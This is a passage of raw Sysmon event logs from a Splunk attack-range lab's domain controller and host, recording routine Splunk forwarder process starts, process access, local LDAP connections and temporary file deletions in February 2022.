Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000286497Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:01.764{C8EA50B7-0FF1-6216-DA04-000000003802}5308C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000215498Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:02.791{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=382324D4FA2DB99C8D12F37D8E0D27C4,SHA256=ECB2B3F7089089D79C7DADC3F2506693BE26660EB60FD9397EB4D0ED483A7563,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286515Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:02.779{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8598A972257D1E6E962D3A88B50196DC,SHA256=3463843B99FDE61C7F4B39E19ABC5D43223AD4D81F86139A3EA1E44019E8782D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286514Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:02.263{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0FF2-6216-DB04-000000003802}5744C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286513Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:02.263{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286512Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:02.263{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286511Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:02.263{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286510Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:02.263{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286509Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:02.263{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-0FF2-6216-DB04-000000003802}5744C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000286508Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:02.263{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0FF2-6216-DB04-000000003802}5744C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000286507Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:02.264{C8EA50B7-0FF2-6216-DB04-000000003802}5744C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000286506Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:02.029{C8EA50B7-0FF1-6216-DA04-000000003802}53085156C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000215499Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:03.932{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=635B50A1A6645B7A6B95D0AB679540C9,SHA256=DCE1BBA12759CB1CD24991CDDC7D81CFE33265901ADCE64DFE6D6C7549E98CAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286516Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:03.951{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93C1024AE00BD21DE49BE31F0B8C203F,SHA256=44BFEF665C98E014497297E0398E22F36461D8AD4DB05199B5E9A38F440480D8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215500Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:01.653{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51260-false10.0.1.12-8000- 10341000x8000000000000000286524Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:04.060{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0FF4-6216-DC04-000000003802}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286523Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:04.060{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286522Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:04.060{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286521Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:04.060{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286520Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:04.060{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286519Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:04.060{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-0FF4-6216-DC04-000000003802}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000286518Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:04.060{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0FF4-6216-DC04-000000003802}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000286517Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:04.061{C8EA50B7-0FF4-6216-DC04-000000003802}5532C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000215501Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:05.150{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA1491783B3867E37CE9ECD2F09F91DD,SHA256=3E7C10FCA15B772EE46279D340BDBF56E3942B6C0A1A01D4B0D592C58CDAF668,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286528Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:03.690{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53344-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000286527Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:03.159{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53343-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000286526Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:03.159{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53343-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000286525Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:04.997{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF420B6198AD76704BDA3F29B224D1FA,SHA256=6BE096B95E6DFDA6D7FA6F5ED74B2B4322A7D607AC0C7C11B42877EB1F29D243,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215502Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:06.197{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C87ECDCECE130A91BAC07A086C6BF46E,SHA256=BE30C61C0BDC6F3C2EEEC0383874DAAF969D5C3AA752F848659B2208E6EEEBF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286530Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:06.301{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-127MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286529Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:06.030{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9580B792F7CD337495900ACE05961FFB,SHA256=46380A368852EA7C50F2BAFAE6FF14D7A0B8AF308DD9258E64ED28905090C2D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215503Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:07.432{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE4BD5BEC6124278E24FB4F091509962,SHA256=96E368B56C87F3BE2C832ADAB86BF8061B7310E6AC76F16E2944297096DAFF07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286536Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:07.303{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-128MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286535Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:07.177{C8EA50B7-F2AD-6215-BB00-000000003802}4488ATTACKRANGE\AdministratorC:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\IE\YKXF6S3A\views[1]MD5=BEE1758A485085BB8A121EB74BA7E96F,SHA256=EDCAD5B1CE8A304B70B8C9EA57D4AEAB740D979FFA59243B943011CB1BA4D57E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286534Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 